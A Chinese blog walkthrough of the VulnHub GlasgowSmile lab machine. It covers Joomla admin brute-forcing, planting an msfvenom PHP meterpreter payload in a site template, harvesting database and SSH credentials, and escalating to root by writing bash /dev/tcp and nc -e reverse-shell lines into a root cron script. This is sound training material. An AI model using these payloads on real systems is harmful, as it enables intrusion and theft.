vulnhub靶机GlasgowSmile

最新推荐文章于 2024-06-06 09:36:43 发布
最新推荐文章于 2024-06-06 09:36:43 发布
阅读量472 收藏 1
点赞数
分类专栏: vulnhub 文章标签: vulnhub 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52450702/article/details/127564335
版权

靶机下载地址http://www.vulnhub.com/entry/glasgow-smile-11,491/
Kail ip:192.168.70.129
靶机 ip:192.168.70.159

一、 信息搜集

靶机ip发现

sudo arp-scan -l

在这里插入图片描述

靶机端口扫描

sudo nmap -sS -Pn -O 192.168.70.159

在这里插入图片描述

进行目录扫描

dirb http://192.168.70.159

在这里插入图片描述

都是以Joomla开头的,
在这里插入图片描述

使用joomscan继续扫描(joomscan可以在github上进行安装下载)

perl joomscan…pl -u url

在这里插入图片描述

扫描到如下信息
在这里插入图片描述

查看链接 http://192.168.70.159/joomla/administrator
发现后台登陆页面

二、密码爆破

尝试弱口令和sql注入不成功,查看大佬的wp发现需要使用密码生成工具,cewl
工具cewl的使用方法https://www.freebuf.com/articles/network/190128.html

命令:cewl http://192.168.70.159/joomla -m 5 -d 1 -w joomla.txt
-w是写入当前目录的文件中
-d表示爬取深度 默认是2
-m表示最小字符长度 生成字典后对joomla的登录页面进行爆破

使用burpsuit对后台登陆页面进行爆破
在这里插入图片描述

使用刚刚生成的字典进行爆破

账号就默认为joomla
爆破出的密码为Gotham

成功登录后台
进行网站的挂马,网站挂马是在网站配置的模板下,步骤如下:extensions—templates—templates,在默认的模板protostar下进行挂马,将木马写在一个新的文件中发现无法访问,这里使用的是在index目录下进行挂马,msf生成的木马加载到index文件源码中,如图所示,加载完成后,使用msf进行监听即可获取会话。
生成木马命令:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.70.129 -f raw >yyy.php
开启msfconsole设置监听
Ues exploit/multi/handle Set payload php/meterpreter/reverse_tcp
Show options
Set lhost 192.168.70.129
Run

在这里插入图片描述

再次访问网站,即可收到会话。
在这里插入图片描述

看很多师傅都是使用的这个反弹脚本,且不会对页面造成视觉上的影响,附上链接
https://pentestmonkey.net/tools/web-shells/php-reverse-shell
下载后,只需要修改ip和端口就可以使用

三、建立数据库和ssh连接

这里查看一下当前目录和权限,决定先使用扫描脚本,扫一下
什么都没有…
使用命令打开一个终端,便于观察

python3 -c “import pty;pty.spawn(‘/bin/bash’)”

在这里插入图片描述

切换到home目录下发现一共有三个用户
在这里插入图片描述

发现www目录下除了html还有一个joomla2的目录,进行查看
查看配置文件发现数据库的账号和密码
在这里插入图片描述

进行数据库连接
在这里插入图片描述

在batjoke数据库下的表中找到如下信息
在这里插入图片描述

Rob为此虚拟机的一个用户,将rob的密码进行base64解密

???AllIHaveAreNegativeThoughts???

使用rob的密码进行ssh登录,登录成功
在这里插入图片描述

四、建立另外两个账号的ssh连接

查看当前的路径和存在的文件
在这里插入图片描述

像是加密内容,进行解密,第二个文档说努力点吧,我不给你提示。。。
这里使用凯撒加密
在这里插入图片描述

发现最后像base64
解出来:

I33hope99my0death000makes44more8cents00than0my0life0

尝试ssh的abner登录
在这里插入图片描述

登录成功
查看两个文件,没得到什么东西,看第一个文件切尔西的微笑,挺不错
再看其他目录,也没有什么其他的东西,现在查看一下三个账户剩下的最后一个账户penguin
查找一下有关penguin的信息
命令:

find / -iname penguin 2>/dev/null
iname证明不区分大小写

发现隐藏文件:
在这里插入图片描述

切换到该目录进行查看
在这里插入图片描述

发现该文件的属于abner用户,将该文件移动到abner用户的主目录下进行解压,否则没有权限。

cp /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip ~
~表示$HOME即用户根目录

然后解压文件
在这里插入图片描述

查看解压出来的文件
在这里插入图片描述

尝试一下最后的密码是不是penguins的ssh密码

scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

解压成功。

五、提权

利用文件权限配置不当进行提权
当某个进程启动权限为ROOT,对应文件编辑权限为普通用户时,我们可以利用该问题点进行提权。
在这里插入图片描述

使用脚本pspy64地址:https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0
在这里插入图片描述

发现隐藏文件.trash_ol一分钟执行一次
在这里插入图片描述

利用这个文件进行提权
使用nano将命令

bash -c 'bash -i >& /dev/tcp/192.168.70.129/4444 0>&1'

或者使用

nc -e /bin/bash 192.168.70.129 9999

使用bash的反弹界面比较美观,这两个都可以接收到会话
写入命令并将exit 0注释掉
在这里插入图片描述

使用nc进行监听,得到flag

在这里插入图片描述

Ie802.3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Glasgow Smile
m0_46580995的博客
10-02 311
dirb 扫描目录发现 joomla joomscan扫一下 cewl -m 5 http://192.168.1.106/joomla/ > dic-words.txt 生成字典爆破用户名密码 得到joomla Gotham 登录后把index.php改成shell 访问并得到shell 在webconfig中·发现mysql用户名密码 登录mysql 找到rob登录密码ssh登录 找到一串rot13 再base64 更换用户 去网站根目录下枚举文件 看见一个隐藏文件 开启pythonhttp服务
Vulnhub GlasgowSmile靶机渗透记录
m0_43424471的博客
10-13 1227
环境配置 镜像下载地址:http://www.vulnhub.com/entry/glasgow-smile-11,491/ 目标:三个user.txt,root权限 Kali Linux IP: 192.168.1.128 GlasgowSmile IP: 192.168.1.142 信息收集 利用netdiscover进行主机发现: netdiscover -i 网卡设备名 使用nmap进行端口扫描: nmap -A -p- -sS 192.168.1.142 使用dirb对80端口
Vulnhub-GlasgowSmile:v-1.1
cr7lyl的博客
12-25 1887
记一次vulnhub的通关过程 对主机全面扫描: 只有22和80端口开启 然后对其进行目录扫描,在扫描时访问web服务(8.
GlasgowSmile-v2靶机复盘
weixin_44681307的博客
07-09 117
在这里我们可以自己创建一个zipfile.py文件,在moonlight.py所在的目录,这样python调用的时候就会先调用我们这个zipfile.py,我们在这个文件中写一个反弹shell,因为moonlight.py是以venom身份运行的,所以我们可以返回一个venom的shell。发现开通了22,80,83,但是8080端口是个开启我们无法访问的状态,所以可以猜测,这个端口可能没有对外开放,只有本地可以访问。
GlasgowSmile靶机渗透记录(超全超详细适用于刚接触网安的小白们)
2301_78192136的博客
11-07 281
重新阅读文件内容,该文件以英文写成类似一封信,但一个单词都不认识,联想到凯撒密码,尝试偏移量1进行解密,得到两段文字,其中一段很容易判断出其大意,猜测其可能为正确解码内容,再对文末的base64加密内容进行解密,得到一串密码。当前计算机的登录用户有root(超管),rob,abner,penguin,sync,mysql,而sync和mysql用户可能是使用某些服务的用户,暂不考虑提权为这两个用户,所以提权目标就是rob,abner,penguin这三个账户,进一步提升为root账户。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
GlasgowSmile-v2靶机全程(超详细!)
qq_68868384的博客
08-09 178
在这里我们可以自己创建一个zipfile.py文件,在moonlight.py所在的目录,这样python调用的时候就会先调用我们这个zipfile.py,我们在这个文件中写一个反弹shell,因为moonlight.py是以venom身份运行的,所以我们可以返回一个venom的shell。我们把这个key复制到kali中创建一个tmp文件,然后执行以下代码,让每行以AF结尾输出到a.txt中去,再执行我们的解密代码,再把换行符删除掉就解密成功,出现了我们第二个密码。
GlasgowSmile靶机复现
m0_72372037的博客
10-18 65
首先将靶机和kali设置到同一个网段内靶机开机发现提供了ip。
零基础打靶—Glasgow Smile靶场
qq_61861243的博客
06-06 1282
10、将复制的shell脚本上传到/index.php中(全部替换),在第48行附近找到ip和port,将ip更改为攻击机的IP,端口可以自己设定(设定合理即可,这里为1234)之后在kali中打开监听 nc-1nvp 1234。12、去/var/www/目录查看有html和joomla2文件,查看joomla2文件,发现了configuration.php,查看该文件,发现了一个数据的用户名和密码。3、我访问Joomla站点,发现只有一个帖子,其中有电影“小丑”的两个场景对话,还发现一个登录窗口。
joomscan 用法
zhaji001
12-10 2449
写在开头的clusterd 这个检查工具真的很很鸡肋,我搭建了四个环境去测试一个都识别不出来tomcat7+9,jboss7+6. 好无奈好无奈,小伙伴们看到就不要在折腾了。 简介 OWASP JoomScan项目 OWASP Joomla!漏洞扫描程序(JoomScan)是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地...
haskell learning1(2)
xiaocainiao_nixi的博客
06-19 190
1. [x^2| x [z| x 50]  # kann Abkürzung für oben 2.[(wert,name)| wert result: [(1,'a'),(1,'b'),(2,'a'),(2,'b'),(3,'a'),(3,'b')] it :: (Enum t, Num t) => [(t, Char)] 3. type MyWeirdType
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7178
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
Kaggle项目:Northeastern SMILE Lab - Recognizing Faces in the Wild
why502b的博客
05-20 983
本Kaggle项目地址:Northeastern SMILE Lab - Recognizing Faces in the Wild 数据集百度网盘下载地址:Kaggle data,提取码为:1mem keras-vggface开源项目下载地址:keras-vggface 项目描述: 该项目使用Families In the Wild (FIW)数据集,要求通过面部识别,判断数据集任意两张图片中的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8306
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
docker 安装教程.md
最新发布
07-01
附件是docker安装教程,文件绿色安全,请大家放心下载,仅供交流学习使用,无任何商业目的!
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值